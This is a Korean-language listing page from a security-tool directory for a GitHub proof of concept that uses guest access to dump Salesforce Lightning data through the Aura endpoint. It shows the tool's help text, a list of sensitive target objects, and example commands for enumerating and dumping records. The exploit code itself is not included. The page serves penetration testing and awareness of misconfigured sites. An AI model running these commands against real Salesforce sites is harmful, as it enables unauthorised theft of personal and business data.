Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
poc_salesforce_lightning — 학술 목적으로만 사용하세요. 게스트 권한으로 Salesforce Lightning을 공격합니다. | Kitploit
도구/GitHubGitHub/moniik/poc_salesforce_lightning
ExploitationWeb Application ExploitationAPI Security TestingData ExfiltrationInformation GatheringPenetration TestingMisconfiguration
GitHubmoniik/poc_salesforce_lightning

poc_salesforce_lightning

학술 목적으로만 사용하세요. 게스트 권한으로 Salesforce Lightning을 공격합니다.

저장소 보기
184465년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Salesforce lightning용 PoC

학술 목적으로만 사용.

이 도구는 게스트 권한을 이용해 Aura lightning 엔드포인트를 통해 Salesforce 객체의 데이터를 덤프합니다.

지저분한 코드지만 양해해줘

요구 사항

  • Python3

사용법

root@kitploit:~
$ python3 exploit.py -h
usage: exploit.py [-h] -u URL [-o [OBJECTS [OBJECTS ...]]] [-l] [-c]
                  [-a AURA_CONTEXT] [-r RECORD_ID] [-d] [-f] [-s]

Exploit Salesforce through the aura endpoint with the guest privilege

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     set the SITE url. e.g. http://url/site_path
  -o [OBJECTS [OBJECTS ...]], --objects [OBJECTS [OBJECTS ...]]
                        set the object name. Default value is "User" object.
                        Juicy Objects: Case,Account,User,Contact,Document,Cont
                        entDocument,ContentVersion,ContentBody,CaseComment,Not
                        e,Employee,Attachment,EmailMessage,CaseExternalDocumen
                        t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelat
                        ion
  -l, --listobj         pull the object list.
  -c, --check           only check aura endpoint
  -a AURA_CONTEXT, --aura_context AURA_CONTEXT
                        set your valid aura_context
  -r RECORD_ID, --record_id RECORD_ID
                        set the recode id to dump the record
  -d, --dump_objects    dump a small number of objects accessible to guest
                        users and saves them in the file.
  -f, --full            if set with -d, dump all pages of objects.
  -s, --skip            if set with -d, skip the objects already dumped.

예시

root@kitploit:~
# just list objects
$ python3 exploit.py -u https://domain.force.com/path/ -l

# show User and Account object
$ python3 exploit.py -u https://domain.force.com/path/ -o User Account

# save all objects(only page 1)
$ python3 exploit.py -u https://domain.force.com/path/ -d -s

참조

  • Salesforce Lightning - 일상적인 커뮤니티를 위한 공격 벡터에 대한 심층 고찰
    • https://www.enumerated.de/index/salesforce
도구 다운로드